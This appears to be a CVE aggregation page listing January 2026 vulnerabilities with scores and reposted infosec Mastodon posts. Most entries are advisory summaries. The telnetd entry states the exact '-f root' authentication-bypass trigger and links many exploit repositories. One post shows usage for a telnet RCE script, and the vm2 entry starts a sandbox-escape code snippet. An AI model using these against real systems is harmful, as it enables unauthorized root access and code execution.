A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within privileged processes.

thehackerwire@mastodon.social at 2026-01-27T12:45:49.000Z ##

🟠 CVE-2025-41726 - High (8.8)

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24827
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-27T12:31:24

1 posts

Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affects Commander-Genius: before Release refs/pull/358/merge.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T10:27:06.000Z ##

🟠 CVE-2026-24827 - High (7.5)

Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affects Commander-Genius: before Release refs/pull/358/merge.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13601
(7.7 HIGH)

EPSS: 0.03%

updated 2026-01-27T10:15:48.420000

1 posts

A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string.

linux@activitypub.awakari.com at 2026-01-23T10:26:56.000Z ## Oracle Linux 10 ELSA-2026-0975 Moderate CVE-2025-13601 Security Update The following updated rpms for Oracle Linux 10 have been uploaded to the Unbreakable Linux Network:

#Oracle #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-1361
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-27T06:30:18

1 posts

ASDA-Soft Stack-based Buffer Overflow Vulnerability

1 repos

#search_error

CVE-2026-24523
(7.5 HIGH)

EPSS: 0.03%

updated 2026-01-27T00:32:17

2 posts

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through <= 1.6.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T15:55:54.000Z ##

🟠 CVE-2026-24523 - High (7.5)

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through &lt;= 1.6.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T15:55:54.000Z ##

🟠 CVE-2026-24523 - High (7.5)

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through &lt;= 1.6.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24536
(7.5 HIGH)

EPSS: 0.03%

updated 2026-01-27T00:31:13

1 posts

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data.This issue affects Webpushr: from n/a through <= 4.38.0.

thehackerwire@mastodon.social at 2026-01-27T12:46:09.000Z ##

🟠 CVE-2026-24536 - High (7.5)

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data.This issue affects Webpushr: from n/a through &lt;= 4.38.0.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24531
(9.8 CRITICAL)

EPSS: 0.11%

updated 2026-01-27T00:31:13

1 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Prowess prowess allows PHP Local File Inclusion.This issue affects Prowess: from n/a through <= 2.3.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T02:44:00.000Z ##

πŸ”΄ CVE-2026-24531 - Critical (9.8)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Prowess prowess allows PHP Local File Inclusion.This issue affects Prowess: from n/a through &lt;= 2.3.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24656
(3.7 LOW)

EPSS: 0.03%

updated 2026-01-26T23:43:30

1 posts

Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter. The Decanter Log Socket Collector exposes port 4560 without authentication. If the collector exposes allowed classes property, this configuration can be bypassed. The Log Socket Collector is vulnerable to deserialization of untrusted data, eventually causing DoS. NB: Decanter Log Socket Collector is not installed by defaul

AAKL@infosec.exchange at 2026-01-26T16:57:41.000Z ##

New.

NIST: CVE-2026-24656: Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter nvd.nist.gov/vuln/detail/CVE-2 #infosec #vulnerability #Apache #NIST

##

CVE-2025-27821
(7.3 HIGH)

EPSS: 0.04%

updated 2026-01-26T23:40:20

1 posts

Out-of-bounds Write vulnerability in Apache Hadoop HDFS native client. This issue affects Apache Hadoop: from 3.2.0 before 3.4.2. Users are recommended to upgrade to version 3.4.2, which fixes the issue.

beyondmachines1@infosec.exchange at 2026-01-26T17:01:02.000Z ##

Apache Hadoop HDFS Native Client Vulnerability

Apache Hadoop's HDFS native client contains a vulnerability (CVE-2025-27821) that allows attackers to cause system crashes or data corruption through an out-of-bounds write.

**If you are using Hadoop HDFS native client, plan an update. The flaw isn't immiediately exploited, so prioritize isolating and limiting who can access the Hadoop cluster using that client. Then plan an update to 3.4.2**
#cybersecurity #infosec #advisory #databreach
beyondmachines.net/event_detai

##

CVE-2026-24490
(8.1 HIGH)

EPSS: 0.01%

updated 2026-01-26T23:36:20

1 posts

### Summary A Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session by uploading a malicious APK. The `android:host` attribute from `<data android:scheme="android_secret_code">` elements is rendered in HTML reports without sanitization, enabling session hijacking and accou

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T01:31:40.000Z ##

🟠 CVE-2026-24490 - High (8.1)

MobSF is a mobile application security testing tool used. Prior to version 4.4.5, a Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim'...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24486
(8.6 HIGH)

EPSS: 0.02%

updated 2026-01-26T23:28:06

2 posts

### Summary A Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. ### Details When `UPLOAD_DIR` is set and `UPLOAD_KEEP_FILENAME` is `True`, the library constructs the file path using `os.path.join(file_dir, fn

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T01:33:20.000Z ##

🟠 CVE-2026-24486 - High (8.6)

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded f...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T01:31:35.000Z ##

🟠 CVE-2026-24486 - High (8.6)

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded f...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24534
(8.8 HIGH)

EPSS: 0.04%

updated 2026-01-26T23:16:10.440000

1 posts

Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booter: from n/a through <= 1.5.7.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T02:44:21.000Z ##

🟠 CVE-2026-24534 - High (8.8)

Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booter: from n/a through &lt;= 1.5.7.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24532
(8.8 HIGH)

EPSS: 0.04%

updated 2026-01-26T23:16:10.283000

1 posts

Missing Authorization vulnerability in SiteLock SiteLock Security sitelock allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteLock Security: from n/a through <= 5.0.2.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T02:44:09.000Z ##

🟠 CVE-2026-24532 - High (8.8)

Missing Authorization vulnerability in SiteLock SiteLock Security sitelock allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteLock Security: from n/a through &lt;= 5.0.2.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24524
(8.1 HIGH)

EPSS: 0.03%

updated 2026-01-26T23:16:09.643000

2 posts

Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.1.35.2.

thehackerwire@mastodon.social at 2026-01-27T15:56:03.000Z ##

🟠 CVE-2026-24524 - High (8.1)

Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through &lt;= 1.1.35.2.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T15:56:03.000Z ##

🟠 CVE-2026-24524 - High (8.1)

Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through &lt;= 1.1.35.2.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22582
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-01-26T21:31:38

2 posts

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (MicrositeUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-26T20:05:24.000Z ##

πŸ”΄ CVE-2026-22582 - Critical (9.8)

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (MicrositeUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagemen...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-26T20:04:15.000Z ##

πŸ”΄ CVE-2026-22582 - Critical (9.8)

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (MicrositeUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagemen...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22585
(9.8 CRITICAL)

EPSS: 0.01%

updated 2026-01-26T21:31:38

2 posts

Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026.

thehackerwire@mastodon.social at 2026-01-26T20:05:03.000Z ##

πŸ”΄ CVE-2026-22585 - Critical (9.8)

Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Mani...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-26T20:03:56.000Z ##

πŸ”΄ CVE-2026-22585 - Critical (9.8)

Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Mani...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24538
(7.6 HIGH)

EPSS: 0.11%

updated 2026-01-26T21:30:35

2 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through <= 1.6.6.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T15:55:39.000Z ##

🟠 CVE-2026-24538 - High (7.6)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through &lt;= 1.6.6.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T15:55:39.000Z ##

🟠 CVE-2026-24538 - High (7.6)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through &lt;= 1.6.6.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24061
(9.8 CRITICAL)

EPSS: 34.45%

updated 2026-01-26T21:30:32

13 posts

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Nuclei template

38 repos

https://github.com/ms0x08-dev/CVE-2026-24061-POC

https://github.com/monstertsl/CVE-2026-24061

https://github.com/m3ngx1ng/cve_2026_24061_cli

https://github.com/Alter-N0X/CVE-2026-24061-POC

https://github.com/leonjza/inetutils-telnetd-auth-bypass

https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root

https://github.com/LucasPDiniz/CVE-2026-24061

https://github.com/DeadlyHollows/CVE-2026-24061-setup

https://github.com/Lingzesec/CVE-2026-24061-GUI

https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061

https://github.com/SafeBreach-Labs/CVE-2026-24061

https://github.com/midox008/CVE-2026-24061

https://github.com/yanxinwu946/CVE-2026-24061--telnetd

https://github.com/XsanFlip/CVE-2026-24061-Scanner

https://github.com/typeconfused/CVE-2026-24061

https://github.com/Chocapikk/CVE-2026-24061

https://github.com/madfxr/Twenty-Three-Scanner

https://github.com/xuemian168/CVE-2026-24061

https://github.com/parameciumzhang/Tell-Me-Root

https://github.com/BrainBob/CVE-2026-24061

https://github.com/hackingyseguridad/root

https://github.com/z3n70/CVE-2026-24061

https://github.com/SystemVll/CVE-2026-24061

https://github.com/cyberpoul/CVE-2026-24061-POC

https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd

https://github.com/balgan/CVE-2026-24061

https://github.com/duy-31/CVE-2026-24061---telnetd

https://github.com/Mr-Zapi/CVE-2026-24061

https://github.com/cumakurt/tscan

https://github.com/JayGLXR/CVE-2026-24061-POC

https://github.com/infat0x/CVE-2026-24061

https://github.com/punitdarji/telnetd-cve-2026-24061

https://github.com/h3athen/CVE-2026-24061

https://github.com/novitahk/Exploit-CVE-2026-24061

https://github.com/TryA9ain/CVE-2026-24061

https://github.com/Gabs-hub/CVE-2026-24061_Lab

https://github.com/r00tuser111/CVE-2026-24061

https://github.com/Ashwesker/Ashwesker-CVE-2026-24061

linux@activitypub.awakari.com at 2026-01-27T08:36:37.000Z ## Critical GNU InetUtils Telnetd Vulnerability Allows Authentication Bypass and Root Access The discovery of CVE-2026-24061 exposes a long-standing critical weakness in the GNU InetUtils telnet daemo...

#Category(Default) #- #Do #Not #Use #This

Origin | Interest | Match ##

DarkWebInformer@infosec.exchange at 2026-01-27T00:27:16.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

##

DarkWebInformer@infosec.exchange at 2026-01-27T00:06:30.000Z ##

‼️CVE-2026-24061: Telnet RCE Exploit

GitHub: github.com/SafeBreach-Labs/CVE

This script exploits the CVE-2026-24061 vulnerability in Telnet servers using a malformed USER environment variable.

CVSS: 9.8

Usage:

python telnet_rce.py <host> [-p <port>]

Arguments:

host: Target IP address or hostname (required)
-p, --port: Target port (default: 23)

Example:

python telnet_rce.py 192.168.1.100
python telnet_rce.py example.com -p 23

Writeup: safebreach.com/blog/safebreach

##

cisakevtracker@mastodon.social at 2026-01-26T21:01:54.000Z ##

CVE ID: CVE-2026-24061
Vendor: GNU
Product: InetUtils
Date Added: 2026-01-26
Notes: This vulnerability could affect an open-source component, third-party library, protocol, or proprietary implementation that could be used by different products. For more information, please see: cgit.git.savannah.gnu.org/cgit ; codeberg.org/inetutils/inetuti; codeberg.org/inetutils/inetuti ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2026-01-26T20:03:53.000Z ##

CISA has updated the KEV catalogue.

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2025-

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability cve.org/CVERecord?id=CVE-2018- #CISA #Linux #infosec #vulnerability #GNU

##

GossiTheDog@cyberplace.social at 2026-01-26T11:09:51.000Z ##

The telnetd vuln has a CVE now - CVE-2026-24061

Proof of concept: github.com/SafeBreach-Labs/CVE

##

patrickcmiller@infosec.exchange at 2026-01-25T23:42:00.000Z ##

11-Year-Old critical telnetd flaw found in GNU InetUtils (CVE-2026-24061) securityaffairs.com/187255/sec

##

youranonnewsirc@nerdculture.de at 2026-01-25T21:24:21.000Z ##

Global: US, Ukraine, and Russia held talks in Abu Dhabi on Jan 24. Israel conducts a large-scale operation for the last hostage in Gaza.

Tech: Apple's iOS 26 update faces user complaints of bugs and battery drain (Jan 25). NVIDIA plans high-performance ARM chips for Q2 2026.

Cybersecurity: A critical GNU InetUtils telnetd vulnerability (CVE-2026-24061) is actively exploited for root access (Jan 24). New DynoWiper malware was used in a failed Sandworm attack on Poland's power sector (Jan 24).

#News #Anonymous #AnonNews_irc

##

beyondmachines1@infosec.exchange at 2026-01-25T09:01:02.000Z ##

GNU InetUtils telnetd Authentication Bypass Exploited in the Wild

A critical authentication bypass in GNU InetUtils telnetd (CVE-2026-24061) is actively exploited only days after the public reporting of the flaw. It's urgent that you block any telnet server you are using from the Internet.

**THIS IS URGENT! Check if you are using Telnet anywhere in your network. IMMEDIATELY isolate the Telnet interface to trusted networks and patch the code. Then stop using Telnet and switch to SSH.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

alios@23.social at 2026-01-25T04:48:39.000Z ##

oh lol - 2026 - 9.8er (critical) CVE im *telnetd* :D (CVE-2026-24061)

nvd.nist.gov/vuln/detail/CVE-2

##

ivarch@fedi.ivarch.com at 2026-01-24T14:18:26.000Z ##

@distrowatch There's a critical vulnerability in the server side, CVE-2026-24061, to do with environment handling - see bleepingcomputer.com/news/secu

##

obivan@infosec.exchange at 2026-01-23T18:51:40.000Z ##

Telnet RCE Exploit github.com/SafeBreach-Labs/CVE

##

defendopsdiaries@infosec.exchange at 2026-01-23T16:35:53.000Z ##

Hackers are now getting instant root access to thousands of legacy devices with a single Telnet handshakeβ€”no password needed. The flaw is shockingly simple and already being exploited. How safe are your old systems?

thedefendopsdiaries.com/cve-20

##

CVE-2018-14634
(7.8 HIGH)

EPSS: 18.00%

updated 2026-01-26T21:30:29

3 posts

An integer overflow flaw was found in the Linux kernel's create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system. Kernel versions 2.6.x, 3.10.x and 4.14.x are believed to be vulnerable.

1 repos

#search_error

DarkWebInformer@infosec.exchange at 2026-01-27T00:27:16.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

##

cisakevtracker@mastodon.social at 2026-01-26T21:01:07.000Z ##

CVE ID: CVE-2018-14634
Vendor: Linux
Product: Kernal
Date Added: 2026-01-26
Notes: This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. Please check with specific vendors for information on patching status. For more information, please see: git.kernel.org/pub/scm/linux/k ; kernel.org/ ; cve.org/CVERecord?id=CVE-2018-; access.redhat.com/errata/RHSA- ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2026-01-26T20:03:53.000Z ##

CISA has updated the KEV catalogue.

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2025-

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability cve.org/CVERecord?id=CVE-2018- #CISA #Linux #infosec #vulnerability #GNU

##

CVE-2026-21962
(10.0 CRITICAL)

EPSS: 0.04%

updated 2026-01-26T21:15:56.233000

2 posts

Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in product of Oracle Fusion Middleware (component: Weblogic Server Proxy Plug-in for Apache HTTP Server, Weblogic Server Proxy Plug-in for IIS). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to c

1 repos

#search_error

AAKL at 2026-01-27T15:55:31.168Z ##

EUVD has listed critical CVE-2026-21962 Oracle HTTP Server vulnerability euvd.enisa.europa.eu/vulnerabi

Oracle Critical Patch Update Advisory - January 2026 oracle.com/security-alerts/cpu

##

AAKL@infosec.exchange at 2026-01-27T15:55:31.000Z ##

EUVD has listed critical CVE-2026-21962 Oracle HTTP Server vulnerability euvd.enisa.europa.eu/vulnerabi

Oracle Critical Patch Update Advisory - January 2026 oracle.com/security-alerts/cpu #infosec #vulnerability #Oracle

##

CVE-2026-22586
(9.8 CRITICAL)

EPSS: 0.01%

updated 2026-01-26T19:16:23.930000

2 posts

Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026.

thehackerwire@mastodon.social at 2026-01-26T20:05:13.000Z ##

πŸ”΄ CVE-2026-22586 - Critical (9.8)

Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-26T20:04:06.000Z ##

πŸ”΄ CVE-2026-22586 - Critical (9.8)

Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22709
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-01-26T18:57:15

5 posts

In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. ```js const { VM } = require("vm2"); const code = ` const error = new Error(); error.name = Symbol(); const f = async () => error.stack; const promise = f(); promise.catch(e => { const Error = e.constructor;

undercodenews@mastodon.social at 2026-01-27T17:38:29.000Z ##

CVE-2026-22709 Exposes Critical vm2 Sandbox Escape Risk in Nodejs Environments

Introduction: A Familiar Sandbox, A Repeating Security Pattern The vm2 library has long been positioned as a safety layer for running untrusted JavaScript inside Node.js applications. For years, it served as a quiet backbone for SaaS platforms, online code runners, chatbots, and developer tools that needed isolation without sacrificing flexibility. However, history has shown that vm2’s…

undercodenews.com/cve-2026-227

##

oversecurity@mastodon.social at 2026-01-27T16:50:56.000Z ##

Critical sandbox escape flaw discovered in popular vm2 NodeJS library

A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing...

πŸ”—οΈ [Bleepingcomputer] link.is.it/hbFnIL

##

oversecurity@mastodon.social at 2026-01-27T16:50:56.000Z ##

Critical sandbox escape flaw discovered in popular vm2 NodeJS library

A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing...

πŸ”—οΈ [Bleepingcomputer] link.is.it/hbFnIL

##

thehackerwire@mastodon.social at 2026-01-26T22:34:19.000Z ##

πŸ”΄ CVE-2026-22709 - Critical (9.8)

vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. In lib/setu...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-01-26T20:10:19.000Z ##

GitHub just updated these:

CVE-2026-22709, critical: vm2 has a Sandbox Escape github.com/advisories/GHSA-99p

CVE-2026-22696, critical: dcap-qvl has Missing Verification for QE Identity github.com/advisories/GHSA-796 #infosec #vulnerability

##

CVE-2026-22696(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-01-26T18:55:14

1 posts

## Impact This vulnerability involves a critical gap in the cryptographic verification process within the dcap-qvl. The library fetches QE Identity collateral (including qe_identity, qe_identity_signature, and qe_identity_issuer_chain) from the PCCS. However, it skips to verify the QE Identity signature against its certificate chain and does not enforce policy constraints on the QE Report. ## Co

1 repos

#search_error

AAKL@infosec.exchange at 2026-01-26T20:10:19.000Z ##

GitHub just updated these:

CVE-2026-22709, critical: vm2 has a Sandbox Escape github.com/advisories/GHSA-99p

CVE-2026-22696, critical: dcap-qvl has Missing Verification for QE Identity github.com/advisories/GHSA-796 #infosec #vulnerability

##

CVE-2026-22583
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-01-26T18:32:34

1 posts

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (CloudPagesUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026.

thehackerwire@mastodon.social at 2026-01-26T18:18:10.000Z ##

πŸ”΄ CVE-2026-22583 - Critical (9.8)

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (CloudPagesUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engageme...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-52024
(9.4 CRITICAL)

EPSS: 0.03%

updated 2026-01-26T18:32:32

1 posts

A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all available backend services and POS web services, each with an HTML form for submitting test input. These panels are intended for developer use, but are

thehackerwire@mastodon.social at 2026-01-26T18:16:18.000Z ##

πŸ”΄ CVE-2025-52024 - Critical (9.4)

A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

